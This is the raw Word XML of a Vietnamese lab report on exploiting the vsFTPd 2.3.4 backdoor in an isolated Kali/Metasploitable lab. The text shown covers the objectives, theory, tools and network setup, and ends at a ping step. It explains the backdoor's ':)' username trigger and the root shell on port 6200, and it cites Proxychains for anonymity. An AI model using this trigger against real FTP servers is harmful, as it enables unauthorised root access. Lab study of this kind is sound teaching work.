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E7F4C" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="00D2454F">
      <w:pPr>
        <w:spacing w:before="600"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE65908" w14:textId="08FA29CE" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">BÁO CÁO </w:t>
      </w:r>
      <w:r w:rsidR="00ED2831">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F25A40" w14:textId="51BB65D9" w:rsidR="00D2454F" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:before="200" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LAB</w:t>
      </w:r>
      <w:r w:rsidR="004C5DC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> TẤN CÔNG LỖ HỔNG vsFTPd 2.3.4 VỚI KỊCH BẢN KALI LINUX VÀ METASPLOITABLE (Host-only Adapter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D3AFE" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="00D2454F">
      <w:pPr>
        <w:spacing w:before="800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D09B474" w14:textId="1D3F1777" w:rsidR="00D2454F" w:rsidRDefault="00D2454F">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1873FDB6" w14:textId="34D8DB8D" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E6B7F0B" w14:textId="7CF5CC7E" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB2F595" w14:textId="7884400C" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A1C9E70" w14:textId="77777777" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:before="1200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185C96C4" w14:textId="63800EDD" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>tháng 9 năm 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3310A1C3" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="00D2454F">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201A9766" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372EEA90" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>1. Mở đầu .........................................................................................</w:t>
      </w:r>
      <w:r>
        <w:t>........ 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE96D3B" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>2. Cơ sở lý thuyết ...................................................................................... 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F103EE3" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.1. Lỗ hổng Zero-day ............................................................................ 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4944C2" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   2.2. Lỗ hổng vsFTPd 2.3.4 Back</w:t>
      </w:r>
      <w:r>
        <w:t>door ..................................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDFAC75" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>3. Môi trường và công cụ thực nghiệm ..................................................... 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7C026" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>4. Quy trình thực nghiệm .......................................................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C33BC3" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.1. Cấu hình mạng Host-only Adapter ................................................. 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD86607" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.2. Kiểm tra kết nối mạng ................................</w:t>
      </w:r>
      <w:r>
        <w:t>.................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF119B" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.3. Quét cổng với Nmap (qua Proxychains) .......................................... 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E332D6" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.4. Xác định phiên bản dịch vụ ............................................................. 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B22192E" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.5. Khai thác lỗ hổng bằ</w:t>
      </w:r>
      <w:r>
        <w:t>ng Metasploit ................................................. 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362CC098" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   4.6. Xác nhận leo thang đặc quyền ........................................................ 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE55A9D" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>5. Phân tích kết quả .........................................................................</w:t>
      </w:r>
      <w:r>
        <w:t>......... 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D2193F" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>6. Biện pháp phòng thủ và bài học kinh nghiệm ....................................... 9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211F420E" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>7. Kết luận ............................................................................................... 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4735E775" w14:textId="033F16C7" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Tài liệu tham khảo ..........................</w:t>
      </w:r>
      <w:r>
        <w:t>......................................................... 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659892A" w14:textId="53EFE4EE" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352E52AE" w14:textId="4D26BD58" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623AB488" w14:textId="012C9DE7" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B247E3" w14:textId="7D7CA64E" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3204F7AF" w14:textId="039EC1AE" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C78E029" w14:textId="443C8EB0" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623AD146" w14:textId="057B5462" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6760E0EE" w14:textId="0AA2068C" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E1D48C" w14:textId="66A3AE5D" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="306505C5" w14:textId="2E9B2432" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10C84C89" w14:textId="6F2CEA59" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29275C95" w14:textId="66178A88" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302A6B68" w14:textId="6667531D" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EC73AD" w14:textId="1E1E7C28" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="128DC8E0" w14:textId="645FF1A5" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC63097" w14:textId="0142EF0B" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FD938D5" w14:textId="4B663A4A" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BD71874" w14:textId="77777777" w:rsidR="00ED2831" w:rsidRDefault="00ED2831">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FD3B35" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1. MỞ ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D559F1" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trong bối cảnh an ninh mạng ngày càng trở nên quan trọng, việc nghiên cứu và thực nghiệm các kỹ thuật tấn công (đặc biệt là tấn công lỗ hổng zero-day) giúp người học hiểu rõ hơn về cách</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> thức hoạt động của các lỗ hổng bảo mật, từ đó xây dựng các biện pháp phòng thủ hiệu quả. Báo cáo này trình bày quá trình thực nghiệm khai thác lỗ hổng backdoor trong phần mềm vsFTPd phiên bản 2.3.4 trên hệ thống Metasploitable, sử dụng hệ điều hành Kali L</w:t>
      </w:r>
      <w:r>
        <w:t>inux và công cụ Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE8256D" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Mục tiêu của thực nghiệm bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF0AD40" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu cách khai thác và tấn công các lỗ hổng bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75335B3F" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Tìm hiểu cách hoạt động của tấn công lỗ hổng zero-day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E406869" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Phân tích nguyên nhân tồn tại của lỗ hổng zero-day.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F26CF9" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Thực hiện và hiểu quá trình leo thang đặc quyền (privilege escalation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B445A" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Rút ra các biện pháp phòng thủ và kinh nghiệm trong việc phát hiện, khắc phục lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A1DDE" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Nâng cao kỹ năng Red Team thông qua thực nghiệm tấn công có kiểm soát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A89A14" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. CƠ SỞ LÝ THUYẾT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2BAF3B" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1. Lỗ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hổng Zero-day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EE4C97" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lỗ hổng zero-day (zero-day vulnerability) là những lỗ hổng bảo mật trong phần mềm hoặc hệ thống mà nhà phát triển chưa biết đến hoặc chưa phát hành bản vá. Khi lỗ hổng này bị khai thác, hệ thống hầu như không có cơ hội phòng thủ kịp thời vì </w:t>
      </w:r>
      <w:r>
        <w:t>chưa có biện pháp bảo vệ chính thức. Đặc điểm nổi bật của zero-day là tính bất ngờ và mức độ nghiêm trọng cao, thường dẫn đến chiếm quyền điều khiển hoặc leo thang đặc quyền.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD2036" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Nguyên nhân tồn tại lỗ hổng zero-day chủ yếu đến từ sai sót trong quá trình lập t</w:t>
      </w:r>
      <w:r>
        <w:t>rình, thiếu sót trong kiểm thử bảo mật, hoặc các điểm yếu trong thiết kế hệ thống. Không có hệ thống nào được xây dựng bởi con người là tuyệt đối an toàn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC98C10" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2. Lỗ hổng vsFTPd 2.3.4 Backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F107D" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>vsFTPd (Very Secure FTP Daemon) là một phần mềm máy chủ FTP phổ biến trên các hệ thống Unix/Linux. Phiên bản 2.3.4 chứa một backdoor độc hại được chèn vào mã nguồn. Khi tên người dùng đăng nhập FTP chứa chuỗi ký tự đặc biệt (ví dụ kết thúc bằng “:)”), back</w:t>
      </w:r>
      <w:r>
        <w:t>door sẽ mở một shell lắng nghe trên cổng 6200, cho phép kẻ tấn công kết nối và chiếm quyền root mà không cần xác thực mật khẩu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F85A9C" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Lỗ hổng này được coi là một ví dụ điển hình về zero-day/backdoor trong phần mềm mã nguồn mở và thường được sử dụng trong các bài</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lab thực hành an ninh mạng (như Metasploitable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB8EC49" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. MÔI TRƯỜNG VÀ CÔNG CỤ THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4D8FA6" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Để thực hiện thực nghiệm, các thành phần sau được chuẩn bị:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538CB90E" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Máy tính vật lý (host machine).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A441B3" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Phần mềm ảo hóa VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30795448" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Hai máy ảo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A32958" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>– Kali Linux (máy tấn công).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4375F0FB" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>– Metasp</w:t>
      </w:r>
      <w:r>
        <w:t>loitable (máy mục tiêu, chứa các dịch vụ có lỗ hổng).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAAA91F" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Công cụ Proxychains (để ẩn danh khi tấn công qua proxy).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1426DF3C" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap (quét cổng và nhận diện dịch vụ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324EB386" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework (khai thác lỗ hổng).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1049F466" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Cấu hình mạng: Cả hai máy ảo được đặt ở chế độ Host-only Adapter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để tạo mạng nội bộ riêng, đảm bảo an toàn và cách ly với mạng thật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0031A2EF" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. QUY TRÌNH THỰC NGHIỆM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B444EF1" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Cấu hình mạng Host-only Adapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56953C28" w14:textId="45037062" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Hai máy ảo Kali Linux và Metasploitable được cấu hình cùng chế độ mạng Host-only Adapter trong VirtualBox. Địa chỉ IP của máy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable là </w:t>
      </w:r>
      <w:r w:rsidR="00A24EDC">
        <w:t>[target ip]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; máy Kali Linux thuộc cùng dải mạng (ví dụ </w:t>
      </w:r>
      <w:r w:rsidR="00A24EDC">
        <w:t>[source ip]</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3631B31F" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4.2. Kiểm tra kết nối mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB18CB2" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Trên máy Kali Linux, sử dụng lệnh ping để kiểm tra khả năng liên thông đến máy mục tiêu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F59BC" w14:textId="5D6B4909" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ping </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[ip máy kali]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD26FAB" w14:textId="77777777" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả nhận được các phản</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hồi ICMP thành công, ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4312BBF4" w14:textId="4544AA61" w:rsidR="00D2454F" w:rsidRDefault="004C5DC3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">64 bytes from </w:t>
      </w:r>
      <w:r w:rsidR="000E60C1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[ip máy kali]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: icmp_seq=1 ttl=64 time=10.7 ms</w:t>
      </w:r>
